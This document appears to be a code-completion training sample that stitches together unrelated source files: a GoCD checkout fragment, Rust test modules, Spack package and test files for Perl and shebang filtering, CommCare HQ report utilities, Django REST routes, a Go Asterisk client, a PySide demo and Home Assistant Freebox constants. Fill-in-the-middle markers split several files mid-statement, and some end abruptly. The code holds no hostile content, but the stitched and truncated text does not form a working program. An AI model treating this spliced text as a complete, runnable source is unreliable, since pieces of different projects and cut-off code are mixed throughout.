SCMRevision scmRevision = new SCMRevision(latestModification.getRevision(), latestModification.getModifiedTime(), null, null, latestModification.getAdditionalDataMap(), null);
File destinationFolder = material.workingDirectory(workingDirectory);
Result result = scmExtension.checkout(material.getScmConfig().getPluginConfiguration().getId(), buildSCMPropertyConfigurations(material.getScmConfig()), destinationFolder.getAbsolutePath(), scmRevision);
handleCheckoutResult(material, result);
} catch (Exception e) {
consumer.taggedErrOutput(PREP_ERR, String.format("Material %s checkout failed: %s", revision.getMaterial().getDisplayName(), e.getMessage()));
throw e;
}
}
private void handleCheckoutResult(PluggableSCMMaterial material, Result result) {
if (result.isSuccessful()) {
if (StringUtils.isNotBlank(result.getMessagesForDisplay())) {
consumer.stdOutput(result.getMessagesForDisplay());
}
} else {
consumer.taggedErrOutput(PREP_ERR, String.format("Material %s checkout failed: %s", material.getDisplayName(), result.getMessagesForDisplay()));
throw new RuntimeException(String.format("Material %s checkout failed: %s", material.getDisplayName(), result.getMessagesForDisplay()));
}
}
private SCMPropertyConfiguration buildSCMPropertyConfigurations(SCM scmConfig) {
SCMPropertyConfiguration scmPropertyConfiguration = new SCMPropertyConfiguration();
populateConfiguration(scmConfig.getConfiguration(), scmPropertyConfiguration);
return scmPropertyConfiguration;
}
private void populateConfiguration(Configuration configuration,
com.thoughtworks.go.plugin.api.config.Configuration pluginConfiguration) {
for (ConfigurationProperty configurationProperty : configuration) {
pluginConfiguration.add(new SCMProperty(configurationProperty.getConfigurationKey().getName(), configurationProperty.getValue()));
}
}
}<|fim▁end|> | * See the License for the specific language governing permissions and |
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>#![allow(dead_code)]
pub mod callback;
#[path = "../../src/utils/environment.rs"]
pub mod environment;
pub mod pool;
pub mod signus;
pub mod wallet;
pub mod ledger;
pub mod anoncreds;
pub mod types;
#[macro_use]
#[path = "../../src/utils/test.rs"]
pub mod test;<|fim▁hole|>pub mod agent;
#[path = "../../src/utils/sequence.rs"]
pub mod sequence;
#[path = "../../src/utils/json.rs"]
pub mod json;
#[macro_use]
#[path = "../../src/utils/cstring.rs"]
pub mod cstring;
#[path = "../../src/utils/inmem_wallet.rs"]
pub mod inmem_wallet;<|fim▁end|> |
#[path = "../../src/utils/timeout.rs"]
pub mod timeout; |
// Copyright 2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// Simple smoke test that unsafe traits can be compiled etc.
// An `unsafe trait`: each `unsafe impl` promises to uphold the trait's
// (implicit) invariants; callers of the trait need no `unsafe` block.
unsafe trait Foo {
    fn foo(&self) -> isize;
}

unsafe impl Foo for isize {
    fn foo(&self) -> isize { *self }
}

// Generic use of the unsafe trait requires no unsafety at the call site.
fn take_foo<F: Foo>(f: &F) -> isize { f.foo() }

fn main() {
    let x: isize = 22;
    assert_eq!(22, take_foo(&x));
}
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
#
# Author: Milton Woods <[email protected]>
# Date: March 22, 2017
# Author: George Hartzell <[email protected]>
# Date: July 21, 2016
# Author: Justin Too <[email protected]>
# Date: September 6, 2015
#
import re
import os
from contextlib import contextmanager
from llnl.util.lang import match_predicate
from spack import *
class Perl(Package):  # Perl doesn't use Autotools, it should subclass Package
    """Perl 5 is a highly capable, feature-rich programming language with over
    27 years of development."""

    homepage = "http://www.perl.org"
    # URL must remain http:// so Spack can bootstrap curl
    url = "http://www.cpan.org/src/5.0/perl-5.24.1.tar.gz"

    executables = [r'^perl(-?\d+.*)?$']

    # see http://www.cpan.org/src/README.html for
    # explanation of version numbering scheme

    # Maintenance releases (even numbers, recommended)
    version('5.32.0', sha256='efeb1ce1f10824190ad1cadbcccf6fdb8a5d37007d0100d2d9ae5f2b5900c0b4')

    # Development releases (odd numbers)
    version('5.31.7', sha256='d05c4e72128f95ef6ffad42728ecbbd0d9437290bf0f88268b51af011f26b57d')
    version('5.31.4', sha256='418a7e6fe6485cc713a86d1227ef112f0bb3f80322e3b715ffe42851d97804a5')

    # Maintenance releases (even numbers, recommended)
    version('5.30.3', sha256='32e04c8bb7b1aecb2742a7f7ac0eabac100f38247352a73ad7fa104e39e7406f', preferred=True)
    version('5.30.2', sha256='66db7df8a91979eb576fac91743644da878244cf8ee152f02cd6f5cd7a731689')
    version('5.30.1', sha256='bf3d25571ff1ee94186177c2cdef87867fd6a14aa5a84f0b1fb7bf798f42f964')
    version('5.30.0', sha256='851213c754d98ccff042caa40ba7a796b2cee88c5325f121be5cbb61bbf975f2')

    # End of life releases
    version('5.28.0', sha256='7e929f64d4cb0e9d1159d4a59fc89394e27fa1f7004d0836ca0d514685406ea8')
    version('5.26.2', sha256='572f9cea625d6062f8a63b5cee9d3ee840800a001d2bb201a41b9a177ab7f70d')
    version('5.24.1', sha256='e6c185c9b09bdb3f1b13f678999050c639859a7ef39c8cad418448075f5918af')
    version('5.22.4', sha256='ba9ef57c2b709f2dad9c5f6acf3111d9dfac309c484801e0152edbca89ed61fa')
    version('5.22.3', sha256='1b351fb4df7e62ec3c8b2a9f516103595b2601291f659fef1bbe3917e8410083')
    version('5.22.2', sha256='81ad196385aa168cb8bd785031850e808c583ed18a7901d33e02d4f70ada83c2')
    version('5.22.1', sha256='2b475d0849d54c4250e9cba4241b7b7291cffb45dfd083b677ca7b5d38118f27')
    version('5.22.0', sha256='0c690807f5426bbd1db038e833a917ff00b988bf03cbf2447fa9ffdb34a2ab3c')
    version('5.20.3', sha256='3524e3a76b71650ab2f794fd68e45c366ec375786d2ad2dca767da424bbb9b4a')
    version('5.18.4', sha256='01a4e11a9a34616396c4a77b3cef51f76a297e1a2c2c490ae6138bf0351eb29f')
    version('5.16.3', sha256='69cf08dca0565cec2c5c6c2f24b87f986220462556376275e5431cc2204dedb6')

    extendable = True

    depends_on('gdbm')
    depends_on('berkeley-db')

    # there has been a long fixed issue with 5.22.0 with regard to the ccflags
    # definition. It is well documented here:
    # https://rt.perl.org/Public/Bug/Display.html?id=126468
    patch('protect-quotes-in-ccflags.patch', when='@5.22.0')

    # Fix build on Fedora 28
    # https://bugzilla.redhat.com/show_bug.cgi?id=1536752
    patch('https://src.fedoraproject.org/rpms/perl/raw/004cea3a67df42e92ffdf4e9ac36d47a3c6a05a4/f/perl-5.26.1-guard_old_libcrypt_fix.patch', level=1, sha256='0eac10ed90aeb0459ad8851f88081d439a4e41978e586ec743069e8b059370ac', when='@:5.26.2')

    # Installing cpanm alongside the core makes it safe and simple for
    # people/projects to install their own sets of perl modules. Not
    # having it in core increases the "energy of activation" for doing
    # things cleanly.
    variant('cpanm', default=True,
            description='Optionally install cpanm with the core packages.')
    variant('shared', default=True,
            description='Build a shared libperl.so library')
    variant('threads', default=True,
            description='Build perl with threads support')

    resource(
        name="cpanm",
        url="http://search.cpan.org/CPAN/authors/id/M/MI/MIYAGAWA/App-cpanminus-1.7042.tar.gz",
        sha256="9da50e155df72bce55cb69f51f1dbb4b62d23740fb99f6178bb27f22ebdf8a46",
        destination="cpanm",
        placement="cpanm"
    )

    phases = ['configure', 'build', 'install']

    @classmethod
    def determine_version(cls, exe):
        """Extract the Perl version from `perl --version` output."""
        perl = spack.util.executable.Executable(exe)
        output = perl('--version', output=str, error=str)
        if output:
            match = re.search(r'perl.*\(v([0-9.]+)\)', output)
            if match:
                return match.group(1)
        return None

    @classmethod
    def determine_variants(cls, exes, version):
        """Infer +/-shared, +/-threads and +/-cpanm from an installed perl."""
        for exe in exes:
            perl = spack.util.executable.Executable(exe)
            output = perl('-V', output=str, error=str)
            variants = ''
            if output:
                match = re.search(r'-Duseshrplib', output)
                if match:
                    variants += '+shared'
                else:
                    variants += '~shared'
                match = re.search(r'-Duse.?threads', output)
                if match:
                    variants += '+threads'
                else:
                    variants += '~threads'
            path = os.path.dirname(exe)
            if 'cpanm' in os.listdir(path):
                variants += '+cpanm'
            else:
                variants += '~cpanm'
            return variants

    # On a lustre filesystem, patch may fail when files
    # aren't writeable so make pp.c user writeable
    # before patching. This should probably walk the
    # source and make everything writeable in the future.
    def do_stage(self, mirror_only=False):
        # Do Spack's regular stage
        super(Perl, self).do_stage(mirror_only)
        # Add write permissions on file to be patched
        filename = join_path(self.stage.source_path, 'pp.c')
        perm = os.stat(filename).st_mode
        os.chmod(filename, perm | 0o200)

    def configure_args(self):
        spec = self.spec
        prefix = self.prefix

        config_args = [
            '-des',
            '-Dprefix={0}'.format(prefix),
            '-Dlocincpth=' + self.spec['gdbm'].prefix.include,
            '-Dloclibpth=' + self.spec['gdbm'].prefix.lib,
        ]

        # Extensions are installed into their private tree via
        # `INSTALL_BASE`/`--install_base` (see [1]) which results in a
        # "predictable" installation tree that sadly does not match the
        # Perl core's @INC structure.  This means that when activation
        # merges the extension into the extendee[2], the directory tree
        # containing the extensions is not on @INC and the extensions can
        # not be found.
        #
        # This bit prepends @INC with the directory that is used when
        # extensions are activated [3].
        #
        # [1] https://metacpan.org/pod/ExtUtils::MakeMaker#INSTALL_BASE
        # [2] via the activate method in the PackageBase class
        # [3] https://metacpan.org/pod/distribution/perl/INSTALL#APPLLIB_EXP
        config_args.append('-Accflags=-DAPPLLIB_EXP=\\"' +
                           self.prefix.lib.perl5 + '\\"')

        # Discussion of -fPIC for Intel at:
        # https://github.com/spack/spack/pull/3081 and
        # https://github.com/spack/spack/pull/4416
        if spec.satisfies('%intel'):
            config_args.append('-Accflags={0}'.format(
                self.compiler.cc_pic_flag))

        if '+shared' in spec:
            config_args.append('-Duseshrplib')

        if '+threads' in spec:
            config_args.append('-Dusethreads')

        if spec.satisfies('@5.31'):
            config_args.append('-Dusedevel')

        return config_args

    def configure(self, spec, prefix):
        configure = Executable('./Configure')
        configure(*self.configure_args())

    def build(self, spec, prefix):
        make()

    @run_after('build')
    @on_package_attributes(run_tests=True)
    def test(self):
        make('test')

    def install(self, spec, prefix):
        make('install')

    @run_after('install')
    def install_cpanm(self):
        spec = self.spec

        if '+cpanm' in spec:
            with working_dir(join_path('cpanm', 'cpanm')):
                perl = spec['perl'].command
                perl('Makefile.PL')
                make()
                make('install')

    def _setup_dependent_env(self, env, dependent_spec, deptypes):
        """Set PATH and PERL5LIB to include the extension and
        any other perl extensions it depends on,
        assuming they were installed with INSTALL_BASE defined."""
        perl_lib_dirs = []
        for d in dependent_spec.traverse(deptype=deptypes):
            if d.package.extends(self.spec):
                perl_lib_dirs.append(d.prefix.lib.perl5)
        if perl_lib_dirs:
            perl_lib_path = ':'.join(perl_lib_dirs)
            env.prepend_path('PERL5LIB', perl_lib_path)

    def setup_dependent_build_environment(self, env, dependent_spec):
        self._setup_dependent_env(env, dependent_spec,
                                  deptypes=('build', 'run'))

    def setup_dependent_run_environment(self, env, dependent_spec):
        self._setup_dependent_env(env, dependent_spec, deptypes=('run',))

    def setup_dependent_package(self, module, dependent_spec):
        """Called before perl modules' install() methods.
        In most cases, extensions will only need to have one line:
        perl('Makefile.PL','INSTALL_BASE=%s' % self.prefix)
        """

        # If system perl is used through packages.yaml
        # there cannot be extensions.
        if dependent_spec.package.is_extension:

            # perl extension builds can have a global perl
            # executable function
            module.perl = self.spec['perl'].command

            # Add variables for library directory
            module.perl_lib_dir = dependent_spec.prefix.lib.perl5

            # Make the site packages directory for extensions,
            # if it does not exist already.
            mkdirp(module.perl_lib_dir)

    @run_after('install')
    def filter_config_dot_pm(self):
        """Run after install so that Config.pm records the compiler that Spack
        built the package with.  If this isn't done, $Config{cc} will
        be set to Spack's cc wrapper script.  These files are read-only, which
        frustrates filter_file on some filesystems (NFSv4), so make them
        temporarily writable.
        """
        kwargs = {'ignore_absent': True, 'backup': False, 'string': False}

        # Find the actual path to the installed Config.pm file.
        perl = self.spec['perl'].command
        config_dot_pm = perl('-MModule::Loaded', '-MConfig', '-e',
                             'print is_loaded(Config)', output=str)

        with self.make_briefly_writable(config_dot_pm):
            match = 'cc *=>.*'
            substitute = "cc => '{cc}',".format(cc=self.compiler.cc)
            filter_file(match, substitute, config_dot_pm, **kwargs)

        # And the path Config_heavy.pl
        d = os.path.dirname(config_dot_pm)
        config_heavy = join_path(d, 'Config_heavy.pl')

        with self.make_briefly_writable(config_heavy):
            match = '^cc=.*'
            substitute = "cc='{cc}'".format(cc=self.compiler.cc)
            filter_file(match, substitute, config_heavy, **kwargs)

            match = '^ld=.*'
            substitute = "ld='{ld}'".format(ld=self.compiler.cc)
            filter_file(match, substitute, config_heavy, **kwargs)

            match = "^ccflags='"
            substitute = "ccflags='%s " % ' '\
                         .join(self.spec.compiler_flags['cflags'])
            filter_file(match, substitute, config_heavy, **kwargs)

    @contextmanager
    def make_briefly_writable(self, path):
        """Temporarily make a file writable, then reset"""
        perm = os.stat(path).st_mode
        os.chmod(path, perm | 0o200)
        yield
        os.chmod(path, perm)

    # ========================================================================
    # Handle specifics of activating and deactivating perl modules.
    # ========================================================================

    def perl_ignore(self, ext_pkg, args):
        """Add some ignore files to activate/deactivate args."""
        ignore_arg = args.get('ignore', lambda f: False)

        # Many perl packages describe themselves in a perllocal.pod file,
        # so the files conflict when multiple packages are activated.
        # We could merge the perllocal.pod files in activated packages,
        # but this is unnecessary for correct operation of perl.
        # For simplicity, we simply ignore all perllocal.pod files:
        patterns = [r'perllocal\.pod$']

        return match_predicate(ignore_arg, patterns)

    def activate(self, ext_pkg, view, **args):
        ignore = self.perl_ignore(ext_pkg, args)
        args.update(ignore=ignore)

        super(Perl, self).activate(ext_pkg, view, **args)

        extensions_layout = view.extensions_layout
        exts = extensions_layout.extension_map(self.spec)
        exts[ext_pkg.name] = ext_pkg.spec

    def deactivate(self, ext_pkg, view, **args):
        ignore = self.perl_ignore(ext_pkg, args)
        args.update(ignore=ignore)

        super(Perl, self).deactivate(ext_pkg, view, **args)

        extensions_layout = view.extensions_layout
        exts = extensions_layout.extension_map(self.spec)
        # Make deactivate idempotent
        if ext_pkg.name in exts:
            del exts[ext_pkg.name]

    @property
    def command(self):
        """Returns the Perl command, which may vary depending on the version
        of Perl.  In general, Perl comes with a ``perl`` command.  However,
        development releases have a ``perlX.Y.Z`` command.

        Returns:
            Executable: the Perl command
        """
        for ver in ('', self.spec.version):
            path = os.path.join(self.prefix.bin, '{0}{1}'.format(
                self.spec.name, ver))
            if os.path.exists(path):
                return Executable(path)
        else:
            msg = 'Unable to locate {0} command in {1}'
            raise RuntimeError(msg.format(self.spec.name, self.prefix.bin))
import collections
import collections.abc
import hashlib

from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from django_prbac.utils import has_privilege

from corehq import privileges, toggles
from corehq.apps.hqwebapp.templatetags.hq_shared_tags import toggle_enabled
from corehq.apps.userreports.const import (
    REPORT_BUILDER_EVENTS_KEY,
    UCR_ES_BACKEND
)
from corehq.apps.userreports.dbaccessors import get_all_es_data_sources
from corehq.apps.userreports.exceptions import BadBuilderConfigError
from corehq.util.soft_assert import soft_assert
def localize(value, lang):
    """
    Localize the given value.

    This function is intended to be used within UCR to localize user supplied
    translations.

    Resolution order for a mapping: the requested ``lang``, then the default
    language, then the translation stored under the alphabetically-smallest
    key.

    :param value: A dict-like object mapping language codes to translations,
        or a plain string (returned unchanged).
    :param lang: A language code.
    """
    # collections.Mapping was removed in Python 3.10; use collections.abc.
    if isinstance(value, collections.abc.Mapping) and len(value):
        # NOTE: falsy translations (e.g. '') are treated as missing.
        return (
            value.get(lang, None) or
            value.get(default_language(), None) or
            value[sorted(value.keys())[0]]
        )
    return value


def default_language():
    """Language code used as a fallback when no translation matches."""
    return "en"
def has_report_builder_add_on_privilege(request):
    """Return True if the request holds any report-builder add-on privilege."""
    for add_on_priv in privileges.REPORT_BUILDER_ADD_ON_PRIVS:
        if has_privilege(request, add_on_priv):
            return True
    return False
def has_report_builder_access(request):
    """Return whether the request may use the report builder at all."""
    builder_toggle = toggle_enabled(request, toggles.REPORT_BUILDER)
    legacy_privilege = has_privilege(request, privileges.REPORT_BUILDER)
    beta_toggle = toggle_enabled(request, toggles.REPORT_BUILDER_BETA_GROUP)
    add_on_privilege = has_report_builder_add_on_privilege(request)

    legacy_access = builder_toggle and legacy_privilege
    return legacy_access or beta_toggle or add_on_privilege
def add_event(request, event):
    """Append a report-builder analytics event to the user's session."""
    existing_events = request.session.get(REPORT_BUILDER_EVENTS_KEY, [])
    request.session[REPORT_BUILDER_EVENTS_KEY] = existing_events + [event]
def has_report_builder_trial(request):
    # Thin wrapper: True when the request carries the report-builder trial
    # privilege.
    return has_privilege(request, privileges.REPORT_BUILDER_TRIAL)
def can_edit_report(request, report):
ucr_toggle = toggle_enabled(request, toggles.USER_CONFIGURABLE_REPORTS)
report_builder_toggle = toggle_enabled(request, toggles.REPORT_BUILDER)
report_builder_beta_toggle = toggle_enabled(request, toggles.REPORT_BUILDER_BETA_GROUP)
add_on_priv = has_report_builder_add_on_privilege(request)
created_by_builder = report.spec.report_meta.created_by_builder
if created_by_builder:
return report_builder_toggle or report_builder_beta_toggle or add_on_priv
else:
return ucr_toggle
def allowed_report_builder_reports(request):
"""
Return the number of report builder reports allowed
"""
builder_enabled = toggle_enabled(request, toggles.REPORT_BUILDER)
legacy_builder_priv = has_privilege(request, privileges.REPORT_BUILDER)
beta_group_enabled = toggle_enabled(request, toggles.REPORT_BUILDER_BETA_GROUP)
if toggle_enabled(request, toggles.UNLIMITED_REPORT_BUILDER_REPORTS):
return float("inf")
if has_privilege(request, privileges.REPORT_BUILDER_30):
return 30
if has_privilege(request, privileges.REPORT_BUILDER_15):
return 15
if (
has_privilege(request, privileges.REPORT_BUILDER_TRIAL) or
has_privilege(request, privileges.REPORT_BUILDER_5) or
beta_group_enabled or
(builder_enabled and legacy_builder_priv)
):
return 5
def number_of_report_builder_reports(domain):
from corehq.apps.userreports.models import ReportConfiguration
existing_reports = ReportConfiguration.by_domain(domain)
builder_reports = filter(
lambda report: report.report_meta.created_by_builder, existing_reports
)
return len(builder_reports)
def get_indicator_adapter(config, raise_errors=False):
from corehq.apps.userreports.sql.adapter import IndicatorSqlAdapter, ErrorRaisingIndicatorSqlAdapter
from corehq.apps.userreports.es.adapter import IndicatorESAdapter
if get_backend_id(config) == UCR_ES_BACKEND:
return IndicatorESAdapter(config)
else:
if raise_errors:
return ErrorRaisingIndicatorSqlAdapter(config)
return IndicatorSqlAdapter(config)
def get_table_name(domain, table_id):
def _hash(domain, table_id):
return hashlib.sha1('{}_{}'.format(hashlib.sha1(domain).hexdigest(), table_id)).hexdigest()[:8]
return truncate_value(
'config_report_{}_{}_{}'.format(domain, table_id, _hash(domain, table_id)),
from_left=False
)
def is_ucr_table(table_name):
return table_name.startswith('config_report_')
<|fim▁hole|>
def truncate_value(value, max_length=63, from_left=True):
"""
Truncate a value (typically a column name) to a certain number of characters,
using a hash to ensure uniqueness.
"""
hash_length = 8
truncated_length = max_length - hash_length - 1
if from_left:
truncated_value = value[-truncated_length:]
else:
truncated_value = value[:truncated_length]
if len(value) > max_length:
short_hash = hashlib.sha1(value).hexdigest()[:hash_length]
return '{}_{}'.format(truncated_value, short_hash)
return value
def get_ucr_es_indices():
sources = get_all_es_data_sources()
return [get_table_name(s.domain, s.table_id) for s in sources]
def get_backend_id(config):
if settings.OVERRIDE_UCR_BACKEND:
return settings.OVERRIDE_UCR_BACKEND
return config.backend_id<|fim▁end|> | |
<|file_name|>sbang.py<|end_file_name|><|fim▁begin|>##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
"""\
Test that Spack's shebang filtering works correctly.
"""
import os
import stat
import pytest
import tempfile
import shutil
import filecmp
from llnl.util.filesystem import mkdirp
import spack
from spack.hooks.sbang import shebang_too_long, filter_shebangs_in_directory
from spack.util.executable import which
short_line = "#!/this/is/short/bin/bash\n"
long_line = "#!/this/" + ('x' * 200) + "/is/long\n"
lua_line = "#!/this/" + ('x' * 200) + "/is/lua\n"<|fim▁hole|>lua_in_text = ("line\n") * 100 + "lua\n" + ("line\n" * 100)
lua_line_patched = "--!/this/" + ('x' * 200) + "/is/lua\n"
node_line = "#!/this/" + ('x' * 200) + "/is/node\n"
node_in_text = ("line\n") * 100 + "lua\n" + ("line\n" * 100)
node_line_patched = "//!/this/" + ('x' * 200) + "/is/node\n"
sbang_line = '#!/bin/bash %s/bin/sbang\n' % spack.spack_root
last_line = "last!\n"
class ScriptDirectory(object):
"""Directory full of test scripts to run sbang instrumentation on."""
def __init__(self):
self.tempdir = tempfile.mkdtemp()
self.directory = os.path.join(self.tempdir, 'dir')
mkdirp(self.directory)
# Script with short shebang
self.short_shebang = os.path.join(self.tempdir, 'short')
with open(self.short_shebang, 'w') as f:
f.write(short_line)
f.write(last_line)
# Script with long shebang
self.long_shebang = os.path.join(self.tempdir, 'long')
with open(self.long_shebang, 'w') as f:
f.write(long_line)
f.write(last_line)
# Lua script with long shebang
self.lua_shebang = os.path.join(self.tempdir, 'lua')
with open(self.lua_shebang, 'w') as f:
f.write(lua_line)
f.write(last_line)
# Lua script with long shebang
self.lua_textbang = os.path.join(self.tempdir, 'lua_in_text')
with open(self.lua_textbang, 'w') as f:
f.write(short_line)
f.write(lua_in_text)
f.write(last_line)
# Node script with long shebang
self.node_shebang = os.path.join(self.tempdir, 'node')
with open(self.node_shebang, 'w') as f:
f.write(node_line)
f.write(last_line)
# Node script with long shebang
self.node_textbang = os.path.join(self.tempdir, 'node_in_text')
with open(self.node_textbang, 'w') as f:
f.write(short_line)
f.write(node_in_text)
f.write(last_line)
# Script already using sbang.
self.has_sbang = os.path.join(self.tempdir, 'shebang')
with open(self.has_sbang, 'w') as f:
f.write(sbang_line)
f.write(long_line)
f.write(last_line)
# Fake binary file.
self.binary = os.path.join(self.tempdir, 'binary')
tar = which('tar', required=True)
tar('czf', self.binary, self.has_sbang)
def destroy(self):
shutil.rmtree(self.tempdir, ignore_errors=True)
@pytest.fixture
def script_dir():
sdir = ScriptDirectory()
yield sdir
sdir.destroy()
def test_shebang_handling(script_dir):
assert shebang_too_long(script_dir.lua_shebang)
assert shebang_too_long(script_dir.long_shebang)
assert not shebang_too_long(script_dir.short_shebang)
assert not shebang_too_long(script_dir.has_sbang)
assert not shebang_too_long(script_dir.binary)
assert not shebang_too_long(script_dir.directory)
filter_shebangs_in_directory(script_dir.tempdir)
# Make sure this is untouched
with open(script_dir.short_shebang, 'r') as f:
assert f.readline() == short_line
assert f.readline() == last_line
# Make sure this got patched.
with open(script_dir.long_shebang, 'r') as f:
assert f.readline() == sbang_line
assert f.readline() == long_line
assert f.readline() == last_line
# Make sure this got patched.
with open(script_dir.lua_shebang, 'r') as f:
assert f.readline() == sbang_line
assert f.readline() == lua_line_patched
assert f.readline() == last_line
# Make sure this got patched.
with open(script_dir.node_shebang, 'r') as f:
assert f.readline() == sbang_line
assert f.readline() == node_line_patched
assert f.readline() == last_line
assert filecmp.cmp(script_dir.lua_textbang,
os.path.join(script_dir.tempdir, 'lua_in_text'))
assert filecmp.cmp(script_dir.node_textbang,
os.path.join(script_dir.tempdir, 'node_in_text'))
# Make sure this is untouched
with open(script_dir.has_sbang, 'r') as f:
assert f.readline() == sbang_line
assert f.readline() == long_line
assert f.readline() == last_line
def test_shebang_handles_non_writable_files(script_dir):
# make a file non-writable
st = os.stat(script_dir.long_shebang)
not_writable_mode = st.st_mode & ~stat.S_IWRITE
os.chmod(script_dir.long_shebang, not_writable_mode)
test_shebang_handling(script_dir)
st = os.stat(script_dir.long_shebang)
assert oct(not_writable_mode) == oct(st.st_mode)<|fim▁end|> | |
<|file_name|>urls.py<|end_file_name|><|fim▁begin|><|fim▁hole|>from rest_framework import routers
from . import viewsets
router = routers.SimpleRouter()
router.register(r"domains", viewsets.DomainViewSet, basename="domain")
router.register(
r"domainaliases", viewsets.DomainAliasViewSet, basename="domain_alias")
router.register(r"accounts", viewsets.AccountViewSet, basename="account")
router.register(r"aliases", viewsets.AliasViewSet, basename="alias")
router.register(
r"senderaddresses", viewsets.SenderAddressViewSet, basename="sender_address")
urlpatterns = router.urls<|fim▁end|> | """Admin API urls."""
|
<|file_name|>modules.go<|end_file_name|><|fim▁begin|>package native
import (
"errors"
"github.com/CyCoreSystems/ari/v5"
)
// Modules provides the ARI modules accessors for a native client
type Modules struct {
client *Client
}
// Get obtains a lazy handle to an asterisk module
func (m *Modules) Get(key *ari.Key) *ari.ModuleHandle {<|fim▁hole|> return ari.NewModuleHandle(m.client.stamp(key), m)
}
// List lists the modules and returns lists of handles
func (m *Modules) List(filter *ari.Key) (ret []*ari.Key, err error) {
if filter == nil {
filter = ari.NodeKey(m.client.appName, m.client.node)
}
modules := []struct {
Name string `json:"name"`
}{}
err = m.client.get("/asterisk/modules", &modules)
if err != nil {
return nil, err
}
for _, i := range modules {
k := m.client.stamp(ari.NewKey(ari.ModuleKey, i.Name))
if filter.Match(k) {
if filter.Dialog != "" {
k.Dialog = filter.Dialog
}
ret = append(ret, k)
}
}
return
}
// Load loads the named asterisk module
func (m *Modules) Load(key *ari.Key) error {
return m.client.post("/asterisk/modules/"+key.ID, nil, nil)
}
// Reload reloads the named asterisk module
func (m *Modules) Reload(key *ari.Key) error {
return m.client.put("/asterisk/modules/"+key.ID, nil, nil)
}
// Unload unloads the named asterisk module
func (m *Modules) Unload(key *ari.Key) error {
return m.client.del("/asterisk/modules/"+key.ID, nil, "")
}
// Data retrieves the state of the named asterisk module
func (m *Modules) Data(key *ari.Key) (*ari.ModuleData, error) {
if key == nil || key.ID == "" {
return nil, errors.New("module key not supplied")
}
data := new(ari.ModuleData)
if err := m.client.get("/asterisk/modules/"+key.ID, data); err != nil {
return nil, dataGetError(err, "module", "%v", key.ID)
}
data.Key = m.client.stamp(key)
return data, nil
}<|fim▁end|> | |
<|file_name|>eventtrans.py<|end_file_name|><|fim▁begin|>#Author velociraptor Genjix <[email protected]>
from PySide.QtGui import *
from PySide.QtCore import *
class MainWindow(QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
button = QPushButton(self)
button.setGeometry(QRect(100, 100, 100, 100))
machine = QStateMachine(self)
s1 = QState()
s1.assignProperty(button, 'text', 'Outside')
s2 = QState()
s2.assignProperty(button, 'text', 'Inside')
enterTransition = QEventTransition(button, QEvent.Enter)
enterTransition.setTargetState(s2)
s1.addTransition(enterTransition)
leaveTransition = QEventTransition(button, QEvent.Leave)
leaveTransition.setTargetState(s1)
s2.addTransition(leaveTransition)
s3 = QState()
s3.assignProperty(button, 'text', 'Pressing...')
pressTransition = QEventTransition(button, QEvent.MouseButtonPress)
pressTransition.setTargetState(s3)
s2.addTransition(pressTransition)
releaseTransition = QEventTransition(button, QEvent.MouseButtonRelease)
releaseTransition.setTargetState(s2)
s3.addTransition(releaseTransition)
machine.addState(s1)
machine.addState(s2)
machine.addState(s3)
<|fim▁hole|> self.show()
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
mainWin = MainWindow()
sys.exit(app.exec_())<|fim▁end|> | machine.setInitialState(s1)
machine.start()
self.setCentralWidget(button) |
<|file_name|>const.py<|end_file_name|><|fim▁begin|>"""Freebox component constants."""
from __future__ import annotations
import socket
from homeassistant.components.sensor import SensorEntityDescription
from homeassistant.const import DATA_RATE_KILOBYTES_PER_SECOND, PERCENTAGE, Platform
DOMAIN = "freebox"
SERVICE_REBOOT = "reboot"
<|fim▁hole|> "app_name": "Home Assistant",
"app_version": "0.106",
"device_name": socket.gethostname(),
}
API_VERSION = "v6"
PLATFORMS = [Platform.BUTTON, Platform.DEVICE_TRACKER, Platform.SENSOR, Platform.SWITCH]
DEFAULT_DEVICE_NAME = "Unknown device"
# to store the cookie
STORAGE_KEY = DOMAIN
STORAGE_VERSION = 1
CONNECTION_SENSORS: tuple[SensorEntityDescription, ...] = (
SensorEntityDescription(
key="rate_down",
name="Freebox download speed",
native_unit_of_measurement=DATA_RATE_KILOBYTES_PER_SECOND,
icon="mdi:download-network",
),
SensorEntityDescription(
key="rate_up",
name="Freebox upload speed",
native_unit_of_measurement=DATA_RATE_KILOBYTES_PER_SECOND,
icon="mdi:upload-network",
),
)
CONNECTION_SENSORS_KEYS: list[str] = [desc.key for desc in CONNECTION_SENSORS]
CALL_SENSORS: tuple[SensorEntityDescription, ...] = (
SensorEntityDescription(
key="missed",
name="Freebox missed calls",
icon="mdi:phone-missed",
),
)
DISK_PARTITION_SENSORS: tuple[SensorEntityDescription, ...] = (
SensorEntityDescription(
key="partition_free_space",
name="free space",
native_unit_of_measurement=PERCENTAGE,
icon="mdi:harddisk",
),
)
# Icons
DEVICE_ICONS = {
"freebox_delta": "mdi:television-guide",
"freebox_hd": "mdi:television-guide",
"freebox_mini": "mdi:television-guide",
"freebox_player": "mdi:television-guide",
